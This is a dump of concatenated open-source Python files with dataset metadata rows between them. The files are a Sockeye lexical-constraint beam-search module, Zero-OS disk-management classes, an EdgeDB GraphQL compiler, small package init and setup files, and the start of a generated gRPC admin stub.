raw_phrases: Optional[RawConstraintList] = None) -> None:
self.final_ids = set() # type: Set[int]
self.children = {} # type: Dict[int,'AvoidTrie']
if raw_phrases:
for phrase in raw_phrases:
self.add_phrase(phrase)
def __str__(self) -> str:
s = '({}'.format(list(self.final_ids))
for child_id in self.children.keys():
s += ' -> {} {}'.format(child_id, self.children[child_id])
s += ')'
return s
def __len__(self) -> int:
"""
Returns the number of avoid phrases represented in the trie.
"""
phrase_count = len(self.final_ids)
for child in self.children.values():
phrase_count += len(child)
return phrase_count
def add_trie(self,
trie: 'AvoidTrie',
phrase: Optional[List[int]] = None) -> None:
self.final_ids |= trie.final()
for child_id, child in trie.children.items():
if child_id not in self.children:
self.children[child_id] = AvoidTrie()
self.children[child_id].add_trie(child)
def add_phrase(self,
phrase: List[int]) -> None:
"""
Recursively adds a phrase to this trie node.
:param phrase: A list of word IDs to add to this trie node.
"""
if len(phrase) == 1:
self.final_ids.add(phrase[0])
else:
next_word = phrase[0]
if next_word not in self.children:
self.children[next_word] = AvoidTrie()
self.step(next_word).add_phrase(phrase[1:])
def step(self, word_id: int) -> Optional['AvoidTrie']:
"""
Returns the child node along the requested arc.
:param phrase: A list of word IDs to add to this trie node.
:return: The child node along the requested arc, or None if no such arc exists.
"""
return self.children.get(word_id, None)
def final(self) -> Set[int]:
"""
Returns the set of final ids at this node.
:return: The set of word IDs that end a constraint at this state.
"""
return self.final_ids
class AvoidState:
"""
Represents the state of a hypothesis in the AvoidTrie.
The offset is used to return actual positions in the one-dimensionally-resized array that
get set to infinity.
:param avoid_trie: The trie containing the phrases to avoid.
:param state: The current state (defaults to root).
"""
def __init__(self,
avoid_trie: AvoidTrie,
state: AvoidTrie = None) -> None:
self.root = avoid_trie
self.state = state if state else self.root
def consume(self, word_id: int) -> 'AvoidState':
"""
Consumes a word, and updates the state based on it. Returns new objects on a state change.
The next state for a word can be tricky. Here are the cases:
(1) If the word is found in our set of outgoing child arcs, we take that transition.
(2) If the word is not found, and we are not in the root state, we need to reset.
This means we pretend we were in the root state, and see if we can take a step
(3) Otherwise, if we are not already in the root state (i.e., we were partially through
the trie), we need to create a new object whose state is the root state
(4) Finally, if we couldn't advance and were already in the root state, we can reuse
this object.
:param word_id: The word that was just generated.
"""
if word_id in self.state.children:
return AvoidState(self.root, self.state.step(word_id))
elif word_id in self.root.children:
return AvoidState(self.root, self.root.step(word_id))
elif self.state != self.root:
return AvoidState(self.root, self.root)
else:
return self
def avoid(self) -> Set[int]:
"""
Returns a set of word IDs that should be avoided. This includes the set of final states from the
root node, which are single tokens that must never be generated.
:return: A set of integers representing words that must not be generated next by this hypothesis.
"""
return self.root.final() | self.state.final()
def __str__(self) -> str:
return str(self.state)
class AvoidBatch:
"""
Represents a set of phrasal constraints for all items in the batch.
For each hypotheses, there is an AvoidTrie tracking its state.
:param batch_size: The batch size.
:param beam_size: The beam size.
:param avoid_list: The list of lists (raw phrasal constraints as IDs, one for each item in the batch).
:param global_avoid_trie: A translator-level vocabulary of items to avoid.
"""
def __init__(self,
batch_size: int,
beam_size: int,
avoid_list: Optional[List[RawConstraintList]] = None,
global_avoid_trie: Optional[AvoidTrie] = None) -> None:
self.global_avoid_states = [] # type: List[AvoidState]
self.local_avoid_states = [] # type: List[AvoidState]
# Store the global trie for each hypothesis
if global_avoid_trie is not None:
self.global_avoid_states = [AvoidState(global_avoid_trie)] * batch_size * beam_size
# Store the sentence-level tries for each item in their portions of the beam
if avoid_list is not None:
for raw_phrases in avoid_list:
self.local_avoid_states += [AvoidState(AvoidTrie(raw_phrases))] * beam_size
def reorder(self, indices: mx.nd.NDArray) -> None:
"""
Reorders the avoid list according to the selected row indices.
This can produce duplicates, but this is fixed if state changes occur in consume().
:param indices: An mx.nd.NDArray containing indices of hypotheses to select.
"""
if self.global_avoid_states:
self.global_avoid_states = [self.global_avoid_states[x] for x in indices.asnumpy()]
if self.local_avoid_states:
self.local_avoid_states = [self.local_avoid_states[x] for x in indices.asnumpy()]
def consume(self, word_ids: mx.nd.NDArray) -> None:
"""
Consumes a word for each trie, updating respective states.
:param word_ids: The set of word IDs.
"""
word_ids = word_ids.asnumpy().tolist()
for i, word_id in enumerate(word_ids):
if self.global_avoid_states:
self.global_avoid_states[i] = self.global_avoid_states[i].consume(word_id)
if self.local_avoid_states:
self.local_avoid_states[i] = self.local_avoid_states[i].consume(word_id)
def avoid(self) -> Tuple[Tuple[int], Tuple[int]]:
"""
Assembles a list of per-hypothesis words to avoid. The indices are (x, y) pairs into the scores
array, which has dimensions (beam_size, target_vocab_size). These values are then used by the caller
to set these items to np.inf so they won't be selected. Words to be avoided are selected by
consulting both the global trie of phrases and the sentence-specific one.
:return: Two lists of indices: the x coordinates and y coordinates.
"""
to_avoid = set() # type: Set[Tuple[int, int]]
for i, state in enumerate(self.global_avoid_states):
for word_id in state.avoid():
if word_id > 0:
to_avoid.add((i, word_id))
for i, state in enumerate(self.local_avoid_states):
for word_id in state.avoid():
if word_id > 0:
to_avoid.add((i, word_id))
return tuple(zip(*to_avoid)) # type: ignore
class ConstrainedHypothesis:
"""
Represents a set of words and phrases that must appear in the output.
A constraint is of two types: sequence or non-sequence.
A non-sequence constraint is a single word and can therefore be followed by anything,
whereas a sequence constraint must be followed by a particular word (the next word in the sequence).
This class also records which constraints have been met.
A list of raw constraints is maintained internally as two parallel arrays. The following raw constraint
represents two phrases that must appear in the output: 14 and 19 35 14.
raw constraint: [[14], [19, 35, 14]]
This is represented internally as:
constraints: [14 19 35 14]
is_sequence: [False False True True]
That is, the constraints are simply concatenated, and we maintain a parallel array indicating whether each
token ID must be followed by the next token ID. The same token ID can be present any number of times.
:param constraint_list: A list of zero or raw constraints (each represented as a list of integers).
:param eos_id: The end-of-sentence ID.
"""
def __init__(self,
constraint_list: RawConstraintList,
eos_id: int) -> None:
# `constraints` records the words of the constraints, as a list (duplicates allowed).
# `is_sequence` is a parallel array that records, for each corresponding constraint,
# whether the current word is the non-final word of a phrasal constraint.
self.constraints = [] # type: List[int]
self.is_sequence = [] # type: List[bool]
for phrase in constraint_list:
self.constraints += phrase
self.is_sequence += [True] * len(phrase)
self.is_sequence[-1] = False
self.eos_id = eos_id
# no constraints have been met
self.met = [False for x in self.constraints]
self.last_met = -1
def __len__(self) -> int:
"""
:return: The number of constraints.
"""
return len(self.constraints)
def __str__(self) -> str:
s = []
for i, word_id in enumerate(self.constraints):
s.append(str(word_id) if self.met[i] is False else 'X')
if self.is_sequence[i]:
s.append('->')
return ' '.join(s)
def size(self) -> int:
"""
:return: the number of constraints
"""
return len(self.constraints)
def num_met(self) -> int:
"""
:return: the number of constraints that have been met.
"""
return sum(self.met)
def num_needed(self) -> int:
"""
:return: the number of un-met constraints.
"""
return self.size() - self.num_met()
def allowed(self) -> Set[int]:
"""
Returns the set of constrained words that could follow this one.
For unfinished phrasal constraints, it is the next word in the phrase.
In other cases, it is the list of all unmet constraints.
If all constraints are met, an empty set is returned.
:return: The ID of the next required word, or -1 if any word can follow
"""
items = set() # type: Set[int]
# Add extensions of a started-but-incomplete sequential constraint
if self.last_met != -1 and self.is_sequence[self.last_met] == 1:
word_id = self.constraints[self.last_met + 1]
if word_id != self.eos_id or self.num_needed() == 1:
items.add(word_id)
# Add all constraints that aren't non-initial sequences
else:
for i, word_id in enumerate(self.constraints):
if not self.met[i] and (i == 0 or not self.is_sequence[i - 1]):
if word_id != self.eos_id or self.num_needed() == 1:
items.add(word_id)
return items
def finished(self) -> bool:
"""
Return true if all the constraints have been met.
:return: True if all the constraints are met.
"""
return self.num_needed() == 0
def is_valid(self, wordid) -> bool:
"""
Ensures </s> is only generated when the hypothesis is completed.
:param wordid: The wordid to validate.
:return: True if all constraints are already met or the word ID is not the EOS id.
"""
return self.finished() or wordid != self.eos_id or (self.num_needed() == 1 and self.eos_id in self.allowed())
def advance(self, word_id: int) -> 'ConstrainedHypothesis':
"""
Updates the constraints object based on advancing on word_id.
There is a complication, in that we may have started but not
yet completed a multi-word constraint. We need to allow constraints
to be added as unconstrained words, so if the next word is
invalid, we must "back out" of the current (incomplete) phrase,
re-setting all of its words as unmet.
:param word_id: The word ID to advance on.
:return: A deep copy of the object, advanced on word_id.
"""
obj = copy.deepcopy(self)
# First, check if we're updating a sequential constraint.
if obj.last_met != -1 and obj.is_sequence[obj.last_met] == 1:
if word_id == obj.constraints[obj.last_met + 1]:
# Here, the word matches what we expect next in the constraint, so we update everything
obj.met[obj.last_met + 1] = True
obj.last_met += 1
else:
# Here, the word is not the expected next word of the constraint, so we back out of the constraint.
index = obj.last_met
while obj.is_sequence[index]:
obj.met[index] = False
index -= 1
obj.last_met = -1
# If not, check whether we're meeting a single-word constraint
else:
# Build a list from all constraints of tuples of the
# form (constraint, whether it's a non-initial sequential, whether it's been met)
constraint_tuples = list(zip(obj.constraints, [False] + obj.is_sequence[:-1], obj.met))
# We are searching for an unmet constraint (word_id) that is not the middle of a phrase and is not met
query = (word_id, False, False)
try:
pos = constraint_tuples.index(query)
obj.met[pos] = True
obj.last_met = pos
except ValueError:
# query not found; identical but duplicated object will be returned
pass
return obj
def init_batch(raw_constraints: List[Optional[RawConstraintList]],
beam_size: int,
start_id: int,
eos_id: int) -> List[Optional[ConstrainedHypothesis]]:
"""
:param raw_constraints: The list of raw constraints (list of list of IDs).
:param beam_size: The beam size.
:param start_id: The target-language vocabulary ID of the SOS symbol.
:param eos_id: The target-language vocabulary ID of the EOS symbol.
:return: A list of ConstrainedHypothesis objects (shape: (batch_size * beam_size,)).
"""
constraints = [None] * (len(raw_constraints) * beam_size) # type: List[Optional[ConstrainedHypothesis]]
if any(raw_constraints):
for i, raw_list in enumerate(raw_constraints):
num_constraints = sum([len(phrase) for phrase in raw_list]) if raw_list is not None else 0
if num_constraints > 0:
hyp = ConstrainedHypothesis(raw_list, eos_id)
idx = i * beam_size
constraints[idx:idx + beam_size] = [hyp.advance(start_id) for x in range(beam_size)]
return constraints
def get_bank_sizes(num_constraints: int,
beam_size: int,
candidate_counts: List[int]) -> List[int]:
"""
Evenly distributes the beam across the banks, where each bank is a portion of the beam devoted
to hypotheses having met the same number of constraints, 0..num_constraints.
After the assignment, banks with more slots than candidates are adjusted.
:param num_constraints: The number of constraints.
:param beam_size: The beam size.
:param candidate_counts: The empirical counts of number of candidates in each bank.
:return: A distribution over banks.
"""
num_banks = num_constraints + 1
bank_size = beam_size // num_banks
remainder = beam_size - bank_size * num_banks
# Distribute any remainder to the end
assigned = [bank_size for x in range(num_banks)]
assigned[-1] += remainder
# Now, moving right to left, push extra allocation to earlier buckets.
# This encodes a bias for higher buckets, but if no candidates are found, space
# will be made in lower buckets. This may not be the best strategy, but it is important
# that you start pushing from the bucket that is assigned the remainder, for cases where
# num_constraints >= beam_size.
for i in reversed(range(num_banks)):
overfill = assigned[i] - candidate_counts[i]
if overfill > 0:
assigned[i] -= overfill
assigned[(i - 1) % num_banks] += overfill
return assigned
class ConstrainedCandidate:
"""
Object used to hold candidates for the beam in topk().
:param row: The row in the scores matrix.
:param col: The column (word ID) in the scores matrix.
:param score: the associated accumulated score.
:param hypothesis: The ConstrainedHypothesis containing information about met constraints.
"""
__slots__ = ('row', 'col', 'score', 'hypothesis')
def __init__(self,
row: int,
col: int,
score: float,
hypothesis: ConstrainedHypothesis) -> None:
self.row = row
self.col = col
self.score = score
self.hypothesis = hypothesis
def __hash__(self):
return hash((self.row, self.col))
def __eq__(self, other):
return self.row == other.row and self.col == other.col
def __str__(self):
return '({}, {}, {}, {})'.format(self.row, self.col, self.score, self.hypothesis.num_met())
def topk(timestep: int,
batch_size: int,
beam_size: int,
inactive: mx.nd.NDArray,
scores: mx.nd.NDArray,
hypotheses: List[ConstrainedHypothesis],
best_ids: mx.nd.NDArray,
best_word_ids: mx.nd.NDArray,
seq_scores: mx.nd.NDArray) -> Tuple[np.array, np.array, np.array, List[ConstrainedHypothesis], mx.nd.NDArray]:
"""
Builds a new topk list such that the beam contains hypotheses having completed different numbers of constraints.
These items are built from three different types: (1) the best items across the whole
scores matrix, (2) the set of words that must follow existing constraints, and (3) k-best items from each row.
:param timestep: The current decoder timestep.
:param batch_size: The number of segments in the batch.
:param beam_size: The length of the beam for each segment.
:param inactive: Array listing inactive rows (shape: (beam_size,)).
:param scores: The scores array (shape: (batch_size if t==1 else beam_size, target_vocab_size)).
:param hypotheses: The list of hypothesis objects.
:param best_ids: The current list of best hypotheses (shape: (beam_size,)).
:param best_word_ids: The parallel list of best word IDs (shape: (beam_size,)).
:param seq_scores: (shape: (beam_size, 1)).
:return: A tuple containing the best hypothesis rows, the best hypothesis words, the scores,
the updated constrained hypotheses, and the updated set of inactive hypotheses.
"""
for sentno in range(batch_size):
rows = slice(sentno * beam_size, sentno * beam_size + beam_size)
if hypotheses[rows.start] is not None and hypotheses[rows.start].size() > 0:
best_ids[rows], best_word_ids[rows], seq_scores[rows], \
hypotheses[rows], inactive[rows] = _sequential_topk(timestep,
beam_size,
inactive[rows],
scores[rows],
hypotheses[rows],
best_ids[rows] - rows.start,
best_word_ids[rows],
seq_scores[rows])
# offsetting since the returned smallest_k() indices were slice-relative
best_ids[rows] += rows.start
else:
# If there are no constraints for this sentence in the batch, everything stays
# the same, except we need to mark all hypotheses as active
inactive[rows] = 0
return best_ids, best_word_ids, seq_scores, hypotheses, inactive
def _sequential_topk(timestep: int,
beam_size: int,
inactive: mx.nd.NDArray,
scores: mx.nd.NDArray,
hypotheses: List[ConstrainedHypothesis],
best_ids: mx.nd.NDArray,
best_word_ids: mx.nd.NDArray,
sequence_scores: mx.nd.NDArray) -> Tuple[np.array, np.array, np.array,
List[ConstrainedHypothesis], mx.nd.NDArray]:
"""
Builds a new topk list such that the beam contains hypotheses having completed different numbers of constraints.
These items are built from three different types: (1) the best items across the whole
scores matrix, (2) the set of words that must follow existing constraints, and (3) k-best items from each row.
:param timestep: The current decoder timestep.
:param beam_size: The length of the beam for each segment.
:param inactive: Array listing inactive rows (shape: (beam_size,)).
:param scores: The scores array (shape: (beam_size, target_vocab_size)).
:param hypotheses: The list of hypothesis objects.
:param best_ids: The current list of best hypotheses (shape: (beam_size,)).
:param best_word_ids: The parallel list of best word IDs (shape: (beam_size,)).
:param sequence_scores: (shape: (beam_size, 1)).
:return: A tuple containing the best hypothesis rows, the best hypothesis words, the scores,
the updated constrained hypotheses, and the updated set of inactive hypotheses.
"""
num_constraints = hypotheses[0].size()
candidates = set()
# (1) Add all of the top-k items (which were passed) in as long as they pass the constraints
for row, col, seq_score in zip(best_ids, best_word_ids, sequence_scores):
row = int(row.asscalar())
col = int(col.asscalar())
if hypotheses[row] is not None and hypotheses[row].is_valid(col):
seq_score = float(seq_score.asscalar())
new_item = hypotheses[row].advance(col)
cand = ConstrainedCandidate(row, col, seq_score, new_item)
candidates.add(cand)
# For each hypothesis, we add (2) all the constraints that could follow it and
# (3) the best item (constrained or not) in that row
best_next = mx.nd.argmin(scores, axis=1)
for row in range(beam_size):
if inactive[row]:
continue
hyp = hypotheses[row]
# (2) add all the constraints that could extend this
nextones = hyp.allowed()
# (3) add the single-best item after this (if it's valid)
col = int(best_next[row].asscalar())
if hyp.is_valid(col):
nextones.add(col)
# Now, create new candidates for each of these items
for col in nextones:
new_item = hyp.advance(col)
score = scores[row, col].asscalar()
cand = ConstrainedCandidate(row, col, score, new_item)
candidates.add(cand)
# Sort the candidates. After allocating the beam across the banks, we will pick the top items
# for each bank from this list
sorted_candidates = sorted(candidates, key=attrgetter('score'))
# The number of hypotheses in each bank
counts = [0 for _ in range(num_constraints + 1)]
for cand in sorted_candidates:
counts[cand.hypothesis.num_met()] += 1
# Adjust allocated bank sizes if there are too few candidates in any of them
bank_sizes = get_bank_sizes(num_constraints, beam_size, counts)
# Sort the candidates into the allocated banks
pruned_candidates = [] # type: List[ConstrainedCandidate]
for i, cand in enumerate(sorted_candidates):
bank = cand.hypothesis.num_met()
if bank_sizes[bank] > 0:
pruned_candidates.append(cand)
bank_sizes[bank] -= 1
num_pruned_candidates = len(pruned_candidates)
inactive[:num_pruned_candidates] = 0
# Pad the beam so array assignment still works
if num_pruned_candidates < beam_size:
inactive[num_pruned_candidates:] = 1
pruned_candidates += [pruned_candidates[num_pruned_candidates - 1]] * (beam_size - num_pruned_candidates)
return (np.array([x.row for x in pruned_candidates]),
np.array([x.col for x in pruned_candidates]),
np.array([[x.score] for x in pruned_candidates]),
[x.hypothesis for x in pruned_candidates],
inactive)
def main(args):
"""
Usage: python3 -m sockeye.lexical_constraints [--bpe BPE_MODEL]
Reads sentences and constraints on STDIN (tab-delimited) and generates the JSON format
that can be used when passing `--json-input` to sockeye.translate. It supports both positive
constraints (phrases that must appear in the output) and negative constraints (phrases that
must *not* appear in the output).
e.g.,
echo -e "Das ist ein Test .\tThis is\ttest" | python3 -m sockeye.lexical_constraints
will produce the following JSON object:
{ "text": "Das ist ein Test .", "constraints": ["This is", "test"] }
If you pass `--avoid` to the script, the constraints will be generated as negative constraints, instead:
echo -e "Das ist ein Test .\tThis is\ttest" | python3 -m sockeye.lexical_constraints --avoid
will produce the following JSON object (note the new keyword):
{ "text": "Das ist ein Test .", "avoid": ["This is", "test"] }
Make sure you apply all preprocessing (tokenization, BPE, etc.) to both the source and the target-side constraints.
You can then translate this object by passing it to Sockeye on STDIN as follows:
python3 -m sockeye.translate -m /path/to/model --json-input --beam-size 20 --beam-prune 20
Note the recommended Sockeye parameters. Beam pruning isn't needed for negative constraints.
"""
import sys
import json
for line in sys.stdin:
line = line.rstrip()
# Constraints are in fields 2+
source, *restrictions = line.split('\t')
obj = {'text': source}
constraints = []
avoid_list = []
for item in restrictions:
if args.avoid:
avoid_list.append(item)
else:
constraints.append(item)
if constraints:
obj['constraints'] = constraints
if avoid_list:
obj['avoid'] = avoid_list
print(json.dumps(obj, ensure_ascii=False), flush=True)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--avoid', action='store_true', help='Constraints are negative constraints')
args = parser.parse_args()
main(args)
| 40.990028 | 119 | 0.625856 |
47dd13a1f9a3cacc2e773f17563dcf302f925b6e | 5,932 | py | Python | sandbox/lib/jumpscale/JumpscaleLibsExtra/sal_zos/disks/Disks.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 1 | 2020-10-05T08:53:57.000Z | 2020-10-05T08:53:57.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/sal_zos/disks/Disks.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 17 | 2019-11-14T08:41:37.000Z | 2020-05-27T09:23:51.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/sal_zos/disks/Disks.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | null | null | null | from enum import Enum
from ..abstracts import Mountable
from .Partition import Partition
from Jumpscale import j
class StorageType(Enum):
SSD = "SSD"
HDD = "HDD"
NVME = "NVME"
ARCHIVE = "ARCHIVE"
CDROM = "CDROM"
class Disks:
"""Subobject to list disks"""
def __init__(self, node):
self.node = node
@property
def client(self):
return self.node.client
def list(self):
"""
List of disks on the node
"""
disks = []
for disk_info in self.client.disk.list():
disks.append(Disk(node=self.node, disk_info=disk_info))
return disks
def get(self, name):
"""
return the disk called `name`
@param name: name of the disk
"""
for disk in self.list():
if disk.name == name:
return disk
return None
def get_device(self, name):
"""
Get device can be either disk or partition
@param name: partition or disk name
@type name: str
@return: Disk or Partition
@rtype: Disk Partition
"""
for disk in self.list():
if disk.devicename == name:
return disk
for partition in disk.partitions:
if partition.devicename == name:
return partition
raise j.exceptions.NotFound("Could not find device with name {}".format(name))
class Disk(Mountable):
"""Disk in a Zero-OS"""
def __init__(self, node, disk_info):
"""
disk_info: dict returned by client.disk.list()
"""
# g8os client to talk to the node
Mountable.__init__(self)
self.node = node
self.name = None
self.size = None
self.blocksize = None
self.partition_table = None
self.mountpoint = None
self.model = None
self._filesystems = []
self._type = None
self.partitions = []
self.transport = None
self._disk_info = disk_info
self._load(disk_info)
@property
def client(self):
return self.node.client
@property
def devicename(self):
return "/dev/{}".format(self.name)
@property
def filesystems(self):
self._populate_filesystems()
return self._filesystems
@property
def type(self):
"""
return the type of the disk
"""
if self._type is None:
if self._disk_info["type"] == "rom":
self._type = StorageType.CDROM
else:
res = self.node.client.disk.seektime(self.devicename)
# assume that if a disk is more than 7TB it's a SMR disk
if res["type"] == "HDD":
if int(self._disk_info["size"]) > (1024 * 1024 * 1024 * 1024 * 7):
self._type = StorageType.ARCHIVE
else:
self._type = StorageType.HDD
elif res["type"] in ["SSD", "SDD"]:
if "nvme" in self._disk_info["name"]:
self._type = StorageType.NVME
else:
self._type = StorageType.SSD
return self._type
def _load(self, disk_info):
self.name = disk_info["name"]
self.size = int(disk_info["size"])
self.blocksize = disk_info["blocksize"] if "blocksize" in disk_info else None
if "table" in disk_info and disk_info["table"] != "unknown":
self.partition_table = disk_info["table"]
self.mountpoint = disk_info["mountpoint"]
self.model = disk_info["model"]
self.transport = disk_info["tran"]
for partition_info in disk_info.get("children", []) or []:
self.partitions.append(Partition(disk=self, part_info=partition_info))
def _populate_filesystems(self):
"""
look into all the btrfs filesystem and populate
the filesystems attribute of the class with the detail of
all the filesystem present on the disk
"""
disk_devices_names = [self.devicename]
disk_devices_names.extend([part.devicename for part in self.partitions])
self._filesystems = []
for fs in self.client.btrfs.list() or []:
for device in fs["devices"]:
if device["path"] in disk_devices_names:
self._filesystems.append(fs)
def mktable(self, table_type="gpt", overwrite=False):
"""
create a partition table on the disk
@param table_type: Partition table type as accepted by parted
@param overwrite: erase any existing partition table
"""
if self.partition_table is not None and overwrite is False:
return
self.client.disk.mktable(disk=self.name, table_type=table_type)
def mkpart(self, start, end, part_type="primary"):
"""
@param start: partition start as accepted by parted mkpart
@param end: partition end as accepted by parted mkpart
@param part_type: partition type as accepted by parted mkpart
"""
before = {p.name for p in self.partitions}
self.client.disk.mkpart(self.name, start=start, end=end, part_type=part_type)
after = {}
for disk in self.client.disk.list():
if disk["name"] != self.name:
continue
for part in disk.get("children", []):
after[part["name"]] = part
name = set(after.keys()) - before
part_info = after[list(name)[0]]
partition = Partition(disk=self, part_info=part_info)
self.partitions.append(partition)
return partition
def __str__(self):
return "Disk <{}>".format(self.name)
def __repr__(self):
return str(self)
def __eq__(self, other):
return self.devicename == other.devicename
| 30.57732 | 86 | 0.568105 |
667bcf9e07a82b5019713d95c61d2a69286d7b9b | 249 | py | Python | build/lib/crowdkit/aggregation/image_segmentation/__init__.py | artinmajdi/crowd-kit | 174e15f256a4929ed71699ffc1797ea87e0e8a99 | [
"Apache-2.0"
] | 91 | 2021-03-02T19:29:04.000Z | 2022-03-24T15:25:06.000Z | build/lib/crowdkit/aggregation/image_segmentation/__init__.py | artinmajdi/crowd-kit | 174e15f256a4929ed71699ffc1797ea87e0e8a99 | [
"Apache-2.0"
] | 5 | 2021-07-01T07:24:08.000Z | 2021-09-19T19:15:40.000Z | src/aggregation/image_segmentation/__init__.py | Toloka/crowd-kit | 126942242781073235ca292aed9f496b614e9516 | [
"Apache-2.0"
] | 6 | 2021-05-21T12:40:29.000Z | 2022-03-28T06:23:24.000Z | from .segmentation_em import SegmentationEM
from .segmentation_rasa import SegmentationRASA
from .segmentation_majority_vote import SegmentationMajorityVote
__all__ = [
'SegmentationEM',
'SegmentationRASA',
'SegmentationMajorityVote'
]
| 24.9 | 64 | 0.815261 |
31c224b008de2a99bcc894b8a0b8c31a9b450a16 | 3,690 | py | Python | edb/server/http_graphql_port/compiler.py | pnijhara/edgedb | 04e47118ef4d2af5dca1a6bd937bb737873329c9 | [
"Apache-2.0"
] | 4 | 2020-04-25T13:52:13.000Z | 2020-09-23T19:14:07.000Z | edb/server/http_graphql_port/compiler.py | pnijhara/edgedb | 04e47118ef4d2af5dca1a6bd937bb737873329c9 | [
"Apache-2.0"
] | null | null | null | edb/server/http_graphql_port/compiler.py | pnijhara/edgedb | 04e47118ef4d2af5dca1a6bd937bb737873329c9 | [
"Apache-2.0"
] | null | null | null | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2019-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import dataclasses
import immutables
from edb import errors
from edb import graphql
from edb.common import debug
from edb.edgeql import compiler as qlcompiler
from edb.pgsql import compiler as pg_compiler
from edb.server import compiler
if TYPE_CHECKING:
from edb.schema import schema as s_schema
@dataclasses.dataclass(frozen=True)
class CompilerDatabaseState(compiler.CompilerDatabaseState):
gqlcore: graphql.GQLCoreSchema
@dataclasses.dataclass(frozen=True)
class CompiledOperation:
sql: bytes
sql_hash: bytes
sql_args: List[str]
dbver: int
cacheable: bool
cache_deps_vars: Optional[FrozenSet[str]]
variables: Dict
class Compiler(compiler.BaseCompiler):
def _wrap_schema(
self,
dbver: int,
schema: s_schema.Schema,
cached_reflection: immutables.Map[str, Tuple[str, ...]],
) -> CompilerDatabaseState:
gqlcore = graphql.GQLCoreSchema(schema)
return CompilerDatabaseState(
dbver=dbver,
schema=schema,
cached_reflection=cached_reflection,
gqlcore=gqlcore,
)
async def compile_graphql(
self,
dbver: int,
gql: str,
tokens: Optional[List[Tuple[int, int, int, str]]],
substitutions: Optional[Dict[str, Tuple[str, int, int]]],
operation_name: str=None,
variables: Optional[Mapping[str, object]]=None,
) -> CompiledOperation:
db = await self._get_database(dbver)
if tokens is None:
ast = graphql.parse_text(gql)
else:
ast = graphql.parse_tokens(gql, tokens)
op = graphql.translate_ast(
db.gqlcore,
ast,
variables=variables,
substitutions=substitutions,
operation_name=operation_name)
ir = qlcompiler.compile_ast_to_ir(
op.edgeql_ast,
schema=db.schema,
options=qlcompiler.CompilerOptions(
json_parameters=True,
),
)
if ir.cardinality.is_multi():
raise errors.ResultCardinalityMismatchError(
f'compiled GrqphQL query has cardinality {ir.cardinality}, '
f'expected ONE')
sql_text, argmap = pg_compiler.compile_ir_to_sql(
ir,
pretty=debug.flags.edgeql_compile,
expected_cardinality_one=True,
output_format=pg_compiler.OutputFormat.JSON)
args = [None] * len(argmap)
for argname, param in argmap.items():
args[param.index - 1] = argname
sql_bytes = sql_text.encode()
sql_hash = self._hash_sql(sql_bytes)
return CompiledOperation(
sql=sql_bytes,
sql_hash=sql_hash,
sql_args=args,
dbver=dbver,
cacheable=op.cacheable,
cache_deps_vars=op.cache_deps_vars,
variables=op.variables_desc,
)
| 28.167939 | 76 | 0.649593 |
090cd2d1629e8f800772c74341be56047a035cb3 | 882 | py | Python | setup.py | alxmamaev/kekas | f0d8f9643e89757ae44a679ecba64454b1236e10 | [
"MIT"
] | 1 | 2019-03-13T13:58:40.000Z | 2019-03-13T13:58:40.000Z | setup.py | alxmamaev/kekas | f0d8f9643e89757ae44a679ecba64454b1236e10 | [
"MIT"
] | null | null | null | setup.py | alxmamaev/kekas | f0d8f9643e89757ae44a679ecba64454b1236e10 | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="kekas",
version="0.1.8",
author="Aleksandr Belskikh",
author_email="belskikh.aleksandr@gmail.com",
description="Jast another DL library.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/belskikh/kekas",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
license="MIT",
python_requires=">=3.6.0",
packages=setuptools.find_packages(),
install_requires=[
"pandas>=0.22",
"numpy>=1.14.6",
"tensorboardX>=1.6",
"torch>=0.4.1",
"torchvision>=0.2.1",
"tqdm>=4.29.1",
"scikit-learn>=0.20"
]
)
| 25.941176 | 50 | 0.602041 |
686da7dff3cdf3899c62281f75d6dbd9570f5cf2 | 64,833 | py | Python | auth3/identity/admin/admin_pb2_grpc.py | auth3-dev/python-sdk | 0a31cf3307441c5ba8220ab5e1f8b30dc3780ee9 | [
"Apache-2.0"
] | null | null | null | auth3/identity/admin/admin_pb2_grpc.py | auth3-dev/python-sdk | 0a31cf3307441c5ba8220ab5e1f8b30dc3780ee9 | [
"Apache-2.0"
] | null | null | null | auth3/identity/admin/admin_pb2_grpc.py | auth3-dev/python-sdk | 0a31cf3307441c5ba8220ab5e1f8b30dc3780ee9 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from auth3.identity.admin import admin_pb2 as devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2
class AdminStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateIdentity = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/CreateIdentity',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityResponse.FromString,
)
self.GetIdentity = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdentity',
